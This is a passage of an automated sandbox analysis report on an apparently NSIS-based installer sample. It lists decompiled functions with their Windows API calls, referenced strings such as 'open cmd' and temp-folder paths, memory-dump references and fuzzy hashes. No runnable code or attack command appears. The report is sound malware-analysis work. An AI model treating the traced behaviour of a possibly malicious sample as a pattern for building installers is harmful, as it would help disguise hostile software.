Instruction Fuzzy Hash: FBB127B1900618FFDB11AF60DD89AAE7B79FB44354F00813AFA41B61A0CB754A92DF58

Function 00406C3F Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8964584eaf82ae0cb152a3b9d71f3809ce5605a589357672a1976e67bd0135b4
Instruction ID: 98dfc50ccd9688b87079ede1b44bfc78bfb7a95d74622a08e623e0ee65e5f8c5
Opcode Fuzzy Hash: 8964584eaf82ae0cb152a3b9d71f3809ce5605a589357672a1976e67bd0135b4
Instruction Fuzzy Hash: B2F17870D04229CBDF28CFA8C8946ADBBB0FF44305F25816ED456BB281D7786A86CF45

Function 0040687E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(771B3420,00425F58,00425710,00405F41,00425710,00425710,00000000,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C4D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 00406889
FindClose.KERNEL32(00000000), ref: 00406895

Strings

X_B, xrefs: 0040687F

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: X_B
API String ID: 2295610775-941606717
Opcode ID: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
Instruction ID: 6d56574ea64d1328abe48e6f64e5cab5a12c2004fb3b9259b4ed260009733db8
Opcode Fuzzy Hash: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
Instruction Fuzzy Hash: AFD0123250A5205BC6406B386E0C84B7A58AF553717268A36F5AAF21E0CB788C6696AC

Function 00403FA1 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FDD
ShowWindow.USER32(?), ref: 00403FFD
GetWindowLongW.USER32(?,000000F0), ref: 0040400F
ShowWindow.USER32(?,00000004), ref: 00404028
DestroyWindow.USER32 ref: 0040403C
SetWindowLongW.USER32(?,00000000,00000000), ref: 00404055
GetDlgItem.USER32(?,?), ref: 00404074
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404088
IsWindowEnabled.USER32(00000000), ref: 0040408F
GetDlgItem.USER32(?,00000001), ref: 0040413A
GetDlgItem.USER32(?,00000002), ref: 00404144
SetClassLongW.USER32(?,000000F2,?), ref: 0040415E
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041AF
GetDlgItem.USER32(?,00000003), ref: 00404255
ShowWindow.USER32(00000000,?), ref: 00404276
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404288
EnableWindow.USER32(?,?), ref: 004042A3
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B9
EnableMenuItem.USER32(00000000), ref: 004042C0
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D8
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042EB
lstrlenW.KERNEL32(00422F08,?,00422F08,00000000), ref: 00404315
SetWindowTextW.USER32(?,00422F08), ref: 00404329
ShowWindow.USER32(?,0000000A), ref: 0040445D

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 121052019-0
Opcode ID: f0b43cd8e7f2e41f431c118fff2888e9d111a3339ebed408ace792690fb64996
Instruction ID: 6cd4652e30ec862c23bd12a6162173760bab2c1fa5186c41ecc3a298f9dddab8
Opcode Fuzzy Hash: f0b43cd8e7f2e41f431c118fff2888e9d111a3339ebed408ace792690fb64996
Instruction Fuzzy Hash: 7FC1C0B1600204ABDB216F21EE49E2B3A69FB94709F41053EF751B51F0CB795882DB2E

Function 00403BF3 Relevance: 44.0, APIs: 14, Strings: 11, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406915: GetModuleHandleA.KERNEL32(?,00000020,?,0040360C,0000000C,?,?,?,?,?,?,?,?), ref: 00406927
Part of subcall function 00406915: GetProcAddress.KERNEL32(00000000,?), ref: 00406942

GetUserDefaultUILanguage.KERNELBASE(00000002,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,00434000,00008001), ref: 00403C0D

Part of subcall function 00406468: wsprintfW.USER32 ref: 00406475

lstrcatW.KERNEL32(1033,00422F08), ref: 00403C74
lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,00434800,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,771B3420), ref: 00403CF4
lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,00434800,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000), ref: 00403D07
GetFileAttributesW.KERNEL32(: Completed), ref: 00403D12
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00403D5B
RegisterClassW.USER32(004289C0), ref: 00403D98
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DB0
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DE5
ShowWindow.USER32(00000005,00000000), ref: 00403E1B
GetClassInfoW.USER32(00000000,RichEdit20W,004289C0), ref: 00403E47
GetClassInfoW.USER32(00000000,RichEdit,004289C0), ref: 00403E54
RegisterClassW.USER32(004289C0), ref: 00403E5D
DialogBoxParamW.USER32(?,00000000,00403FA1,00000000), ref: 00403E7C

Strings

RichEdit20W, xrefs: 00403E3F, 00403E45
.exe, xrefs: 00403D01
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403BF8
RichEdit, xrefs: 00403E4E
_Nb, xrefs: 00403D77, 00403DDF
RichEd20, xrefs: 00403E21
1033, xrefs: 00403C13, 00403C6F
.DEFAULT\Control Panel\International, xrefs: 00403C5F
: Completed, xrefs: 00403CBB, 00403CC4, 00403CD2, 00403D21, 00403D27
RichEd32, xrefs: 00403E2F
Control Panel\Desktop\ResourceLocale, xrefs: 00403C27

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user~1\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 606308-692862253
Opcode ID: 0956769c01ddca14b96dea91265e8b7d4d10852685e549966d2ead3f546cae20
Instruction ID: 6a74b9b34ded998ebd2751605f77428bf44f11e359ee0ac59d58ca77ea789e65
Opcode Fuzzy Hash: 0956769c01ddca14b96dea91265e8b7d4d10852685e549966d2ead3f546cae20
Instruction Fuzzy Hash: 2C61B770200740BAD620AF669D46F2B3A7CEB84B45F81453FF941B61E2CB7D5942CB6D

Function 00403082 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403093
GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 004030AF

Part of subcall function 00406011: GetFileAttributesW.KERNELBASE(00000003,004030C2,00437800,80000000,00000003), ref: 00406015
Part of subcall function 00406011: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406037

GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 004030FB
GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231

Strings

Error launching installer, xrefs: 004030D2
soft, xrefs: 00403170
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403089
C:\Users\user\Desktop, xrefs: 004030DD, 004030E2, 004030E8
Inst, xrefs: 00403167
Null, xrefs: 00403179
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403258

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-4051493828
Opcode ID: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
Instruction ID: 0271efb430f2efbe2fca7880162b12dddab7439e54d706f300c55aed9b32fb97
Opcode Fuzzy Hash: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
Instruction Fuzzy Hash: 7B51C071A01304ABDB209F65DD85B9E7FACAB09316F10407BF904B62D1D7789E818B5D

Function 0040655E Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 204
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 00406680
GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,?,00000000,00000000,00418EC0,00000000), ref: 00406696
SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 004066F4
CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 004066FD
lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406728
lstrlenW.KERNEL32(: Completed,00000000,Completed,?,?,00000000,00000000,00418EC0,00000000), ref: 00406782

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406651
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406722
Completed, xrefs: 00406582
: Completed, xrefs: 0040658B, 00406645, 0040664C, 00406650, 00406669, 0040666A, 0040667F, 00406695, 004066C6, 004066F2, 00406727, 0040672D, 0040674A, 0040675D, 0040677B, 00406781, 0040678A, 004067BF
Genetics Announcements Mess Premier Appliance Structures , xrefs: 00406757

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
String ID: : Completed$Completed$Genetics Announcements Mess Premier Appliance Structures $Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4024019347-2370702845
Opcode ID: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
Instruction ID: c1bee3e663878f3afad94de22ef935420ccf361ce06c76a1d76179cfc985cdfa
Opcode Fuzzy Hash: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
Instruction Fuzzy Hash: 266146B1A043019BDB205F28DD80B6B77E4AF84318F65053FF646B32D1DA7D89A18B5E

Function 00401774 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B5
CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache,?,?,00000031), ref: 004017DA

Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E

Part of subcall function 004055A6: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
Part of subcall function 004055A6: lstrlenW.KERNEL32(004033F2,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
Part of subcall function 004055A6: lstrcatW.KERNEL32(Completed,004033F2), ref: 00405601
Part of subcall function 004055A6: SetWindowTextW.USER32(Completed,Completed), ref: 00405613
Part of subcall function 004055A6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
Part of subcall function 004055A6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
Part of subcall function 004055A6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661

Strings

open cmd, xrefs: 0040183A, 00401856
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 004017A3
open, xrefs: 00401792, 0040179B, 004017BA, 004017C6, 004017FC, 00401812, 00401830, 0040186C, 004018ED, 004018F6, 00401900, 0040190B

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache$open$open cmd
API String ID: 1941528284-535101974
Opcode ID: fee3e7ed0ab5e121637f04a725511c5a0f25f3915fa7b28c3905e20eb0eb94be
Instruction ID: 1777f765e23ed303a4c4324df0f40fc052c607b9e3f25272d24a03cacca2a4dc
Opcode Fuzzy Hash: fee3e7ed0ab5e121637f04a725511c5a0f25f3915fa7b28c3905e20eb0eb94be
Instruction Fuzzy Hash: 9E41A531900509BACF117BA9DD86DAF3AB5EF45328B20423FF512B10E1DB3C8A52966D

Function 004055A6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
lstrlenW.KERNEL32(004033F2,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
lstrcatW.KERNEL32(Completed,004033F2), ref: 00405601
SetWindowTextW.USER32(Completed,Completed), ref: 00405613
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661

Strings

Completed, xrefs: 004055C7, 004055D7, 004055DD, 00405600, 0040560C

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Completed
API String ID: 2531174081-3087654605
Opcode ID: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
Instruction ID: deb6953f75989b306d4e6df0e2073f5bc52164b7b2c012b705af3b177d86a23e
Opcode Fuzzy Hash: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
Instruction Fuzzy Hash: 8F21B375900158BACB119FA5DD84ECFBF75EF45364F50803AF944B22A0C77A4A51CF68

Function 004032B9 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040331A
GetTickCount.KERNEL32 ref: 0040339B
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033C8
wsprintfW.USER32 ref: 004033DB

Strings

... %d%%, xrefs: 004033D5

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
Instruction ID: 25ee467b37f7358b1d8943912f63d539eb3ef7c07a249f5ee2dc3eaa61b9464a
Opcode Fuzzy Hash: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
Instruction Fuzzy Hash: 5B518E31900219EBCB11DF65DA44BAF3FA8AB40726F14417BF804BB2C1D7789E408BA9

Function 004068A5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068BC
wsprintfW.USER32 ref: 004068F7
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040690B

Strings

%s%S.dll, xrefs: 004068F1
UXTHEME, xrefs: 004068AE

Memory Dump Source

Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME
API String ID: 2200240437-1106614640
Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction ID: d40490b37a95929041f6b14fe17981fa15644a851550e805e000283098582d10
Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction Fuzzy Hash: 41F0FC31511119AACF10BB64DD0DF9B375C9B00305F10847AE546F10D0EB789A68CBA8

Function 00406040 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

